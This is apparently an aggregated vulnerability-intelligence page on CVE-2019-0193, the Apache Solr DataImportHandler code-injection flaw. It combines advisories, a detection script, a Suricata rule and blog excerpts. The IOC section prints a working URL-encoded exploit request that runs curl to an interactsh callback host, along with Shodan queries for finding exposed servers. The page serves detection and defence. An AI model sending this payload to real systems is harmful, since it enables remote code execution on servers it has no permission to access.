CVE-2019-0193
Published: 2019-08-01
Priority: P1 · 85 · high
CVSS 3.1: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability (due 2022-06-10)
Exploited in the wild
EPSS: 83.55% (99.6th percentile)
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | apache_solr | — | — |
| apache | solr | < 7.7.3 | 7.7.3 |
| apache | solr | >= 8.1.0 < 8.1.2 | 8.1.2 |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | lucene-solr | < lucene-solr 3.6.2+dfsg-22 (bookworm) | lucene-solr 3.6.2+dfsg-22 (bookworm) |
Detection & IOCs (extracted from sources)
command: command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
- Exploit POST requests target the /solr/<core>/dataimport endpoint with Content-Type: application/x-www-form-urlencoded and the X-Requested-With: XMLHttpRequest header; the body contains debug=true and a dataConfig parameter embedding a <script> block with Java Runtime.exec() calls.
- Exploitation is confirmed by an outbound HTTP interaction (e.g., curl callback) originating from the Solr Java process; monitor for unexpected outbound HTTP/DNS from the Solr JVM process.
- Shodan/FOFA queries can identify exposed Solr instances: search for http.title:"apache solr", http.title:"solr admin", title="solr admin", or intitle:"apache solr" to find potentially vulnerable targets.
- In post-exploitation (Kinsing campaign), the attacker's initial runtime command was executed under the Java process of Apache Solr; alert on child process spawning (e.g., curl, sh, wget) from the Solr JVM.
- Kinsing post-exploitation drops a shell script to /tmp/zzz fetched from 194.87.252[.]159; monitor for curl/wget writing to /tmp with subsequent execution.
- The vulnerability is only exploitable when the DIH module is enabled and the dataConfig request parameter is accepted; starting with Solr 8.2.0, the Java System property 'enable.dih.dataConfigParam' must be explicitly set to true for the parameter to be accepted.
- As a mitigation short of patching, solrconfig.xml can be edited to configure all DataImportHandler usages with an 'invariants' section listing the 'dataConfig' parameter set to an empty string, or network controls can restrict access to the DataImportHandler endpoint.
- The Nuclei template uses an OAST/interactsh callback to confirm exploitation; passive/blind detection requires an out-of-band interaction channel and will not fire on network-isolated Solr instances.
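The request-side signals listed above (the dataimport endpoint, debug=true, a request-supplied dataConfig carrying a script block) can be checked in proxy or access logs with a small classifier. This is an added example, not code from this page or from any vendor rule; the function name, severity labels and sample requests are constructed for illustration, and the script body in the sample is a harmless placeholder.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Signals taken from the detection notes and the Suricata rule on this page.
DIH_PATH = re.compile(r"^/solr/[^/]+/dataimport/?$", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
SCRIPT_TRANSFORMER = re.compile(r"transformer\s*=\s*[\"'][^\"']*\bscript:", re.IGNORECASE)
EXEC_WORD = re.compile(r"\bexec\b", re.IGNORECASE)


def classify_dih_request(method, uri, body=""):
    """Return (severity, reasons) for one HTTP request seen by a proxy or WAF."""
    parts = urlsplit(uri)
    if not DIH_PATH.match(parts.path):
        return ("none", [])
    # Solr accepts parameters in the query string as well as in a form body.
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    # An empty dataConfig carries no configuration, so it is not a finding.
    configs = [v for v in params.get("dataConfig", []) if v.strip()]
    if not configs:
        return ("none", [])
    severity, reasons = "medium", ["request-supplied dataConfig"]
    if any(v.strip().lower() == "true" for v in params.get("debug", [])):
        reasons.append("debug=true")
    for cfg in configs:  # parse_qs has already URL-decoded the value
        if SCRIPT_TAG.search(cfg):
            severity = "high"
            reasons.append("inline <script> block")
        if SCRIPT_TRANSFORMER.search(cfg):
            severity = "high"
            reasons.append("script: transformer")
        if EXEC_WORD.search(cfg):
            reasons.append("exec keyword")
    return (severity, reasons)


# Constructed sample DIH configs; the script body is a harmless placeholder.
CFG_WITH_SCRIPT = (
    '<dataConfig><script><![CDATA[ function f(row) { return row; } ]]></script>'
    '<document><entity name="e" transformer="script:f"/></document></dataConfig>'
)
CFG_PLAIN = '<dataConfig><document><entity name="e"/></document></dataConfig>'

# Constructed requests: (method, uri, body).
SAMPLES = {
    "routine": ("POST", "/solr/test/dataimport",
                urlencode({"command": "full-import", "clean": "false"})),
    "debug_script": ("POST", "/solr/test/dataimport",
                     urlencode({"command": "full-import", "debug": "true",
                                "dataConfig": CFG_WITH_SCRIPT})),
    "plain_config": ("POST", "/solr/test/dataimport",
                     urlencode({"command": "full-import", "dataConfig": CFG_PLAIN})),
    "query_string": ("GET", "/solr/test/dataimport?"
                     + urlencode({"dataConfig": CFG_WITH_SCRIPT}), ""),
    "other_handler": ("POST", "/solr/test/select",
                      urlencode({"dataConfig": CFG_WITH_SCRIPT})),
}


def run_samples():
    """Classify every constructed sample request."""
    return {name: classify_dih_request(*req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, (severity, reasons) in run_samples().items():
        print(f"{name:14} {severity:6} {', '.join(reasons)}")
```

Any request-supplied dataConfig is reported, since a patched or invariants-hardened deployment has no reason to receive one; the script checks only raise the severity.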
CVSS provenance
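| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.2 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| osv | | 7.2 | HIGH | |
| vulncheck | | 7.2 | HIGH | |
| cisa | | 7.2 | HIGH | |
| vendor_debian | | 7.2 | LOW | |
| vendor_redhat | | 7.2 | HIGH | |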
GHSA
XML External Entity (XXE) Injection in Apache Solr
ghsa·2019-08-01
CVE-2019-0193 [HIGH] CWE-94 XML External Entity (XXE) Injection in Apache Solr
OSV
CVE-2019-0193: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the who
osv·2019-08-01·CVSS 7.2
CVE-2019-0193 [HIGH] CVE-2019-0193: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the who
OSV
XML External Entity (XXE) Injection in Apache Solr
osv·2019-08-01
CVE-2019-0193 [HIGH] XML External Entity (XXE) Injection in Apache Solr
VulnCheck
Apache Solr DataImportHandler Code Injection Vulnerability
vulncheck·2019·CVSS 7.2
CVE-2019-0193 [HIGH] CWE-94 Apache Solr DataImportHandler Code Injection Vulnerability
The optional Apache Solr module DataImportHandler contains a code injection vulnerability.
Affected: Apache Solr
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bots/; https://cujo.com/the-sysrv-botnet-and-how-it-evolved/; https://www.cisa.gov/sites/default/files/fee
Ubuntu
Apache Solr vulnerability
vendor_ubuntu·2025-02-21
CVE-2019-0193 Apache Solr vulnerability
Title: Apache Solr vulnerability
Summary: Apache Solr could be made to execute arbitrary code if it received
specially crafted input.
It was discovered that the Apache Solr DataImportHandler module incorrectly
handled certain request parameters in a default configuration. A remote
attacker could possibly use this issue to execute arbitrary code.
Instructions: In general, a standard system update will make all the necessary changes.
CISA
Apache Solr DataImportHandler Code Injection Vulnerability
cisa·2021-12-10·CVSS 7.2
CVE-2019-0193 [HIGH] CWE-94 Apache Solr DataImportHandler Code Injection Vulnerability
Vulnerability: Apache Solr DataImportHandler Code Injection Vulnerability
Affected: Apache Solr
The optional Apache Solr module DataImportHandler contains a code injection vulnerability.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-0193
Remediation Due Date: 2022-06-10
Red Hat
solr: Remote Code Execution via DataImportHandler
vendor_redhat·2019-07-31·CVSS 7.2
CVE-2019-0193 [HIGH] CWE-20 solr: Remote Code Execution via DataImportHandler
A flaw was found in Apache Solr’s DataImportHandler(DIH). A DIH configuration containing scripts coming from a request's dataConfig parameter allows an attacker to perform remote code execution.
Mitigat
Debian
CVE-2019-0193: lucene-solr - In Apache Solr, the DataImportHandler, an optional but popular module to pull in...
vendor_debian·2019·CVSS 7.2
CVE-2019-0193 [HIGH] CVE-2019-0193: lucene-solr - In Apache Solr, the DataImportHandler, an optional but popular module to pull in...
Scope: local
bookworm: resolved (fixed in 3.6.2+dfsg-22)
bullseye: resolved (fixed in 3.6.2+dfsg-22)
forky: resolved (fixed in 3.6.2+dfsg-22)
sid: resolved (fixed in 3.6.2+dfsg-22)
trixie: resolved (fixed in 3.6.2+dfsg-22)
Suricata
ET EXPLOIT Solr DataImport Handler RCE (CVE-2019-0193)
suricata·2021-06-08·CVSS 7.2
CVE-2019-0193 [HIGH] ET EXPLOIT Solr DataImport Handler RCE (CVE-2019-0193)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Solr DataImport Handler RCE (CVE-2019-0193)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/solr/"; content:"dataimport"; distance:0; http.request_body; content:"command=full-import"; fast_pattern; pcre:"/\bexec\b/Ri"; reference:cve,2019-0193; reference:url,github.com/jas502n/CVE-2019-0193; classtype:attempted-admin; sid:2033114; rev:2; metadata:attack_target Client_Endpoint, created_at 2021_06_08, cve CVE_2019_0193, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_26;)
Nuclei
Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
nuclei·CVSS 7.2
CVE-2019-0193 [HIGH] Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
Template:
id: CVE-2019-0193
info:
  name: Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
  author: pdteam
  severity: high
  description: |
    Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular
Wiz
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
blogs_wiz·2023-09-06
During the summer of 2023, Wiz Research detected several different cryptomining incidents targeting cloud workloads. Combining Wiz Runtime Sensor events and information from Wiz agentless scanning, we were able to pinpoint security flaws that led to the attackers’ initial access, assess the scope of the compromised resources, and analyze the attackers’ activities.
Cryptomining stands out as a common threat to cloud workloads since it takes advantage of paid computing resources and yields direct monetary gains for the attackers. The threat actors behind these activities are mostly interested in making quick profits, aiming to spread their opportunistic mining operations as far and as wide as possible. Typically, these attacks aren't very complex or stealthy. The attackers usually look for
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Authors: Lei Xu, Yue Guan, Vaibhav Singhal
Published: April 12, 2021
Zscaler
A look at the recent BuleHero botnet payload | Zscaler
blogs_zscaler·2019-12-12
HackerOne
Remote Code Execution on █████████
hackerone·2020-09-03·CVSS 9.8
CVE-2019-0192 [CRITICAL] Remote Code Execution on █████████
**Summary:**
An unauth Solr leads to RCE on ██████████
**Description:**
Hello, I found an unauth Solr at https://██████/solr/
This version is 5.5.1, vulnerable to CVE-2019-0192 and CVE-2019-0193; I tried CVE-2019-0193 and got RCE successfully.
## Impact
Attacker can get shell on server.
## Step-by-step Reproduction Instructions
1. First go to Core Admin and copy path.
██████
2. Update the config.
███████
3. Execute code.
██████████
## Product, Version, and Configuration (If applicable)
Apache Solr 5.5.1
## Suggested Mitigation/Remediation Actions
Update to the latest version and set auth.
Bugzilla
CVE-2019-0193 solr3: solr: Remote Code Execution via DataImportHandler [fedora-all]
bugzilla·2019-08-02·CVSS 7.2
CVE-2019-0193 [HIGH] CVE-2019-0193 solr3: solr: Remote Code Execution via DataImportHandler [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2019-0193 solr: Remote Code Execution via DataImportHandler
bugzilla·2019-08-01·CVSS 7.2
CVE-2019-0193 [HIGH] CVE-2019-0193 solr: Remote Code Execution via DataImportHandler
The DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
References:
https://issues.apache.org/jira/browse/SOLR-13669
Discussion:
Created solr3 tracking bugs for this issue:
Affects: fedora-all [bug 1736775]
---
This vulnerability is out of security suppor
2019-08-01: Published
2021-12-10: Added to CISA KEV
Exploited in the wild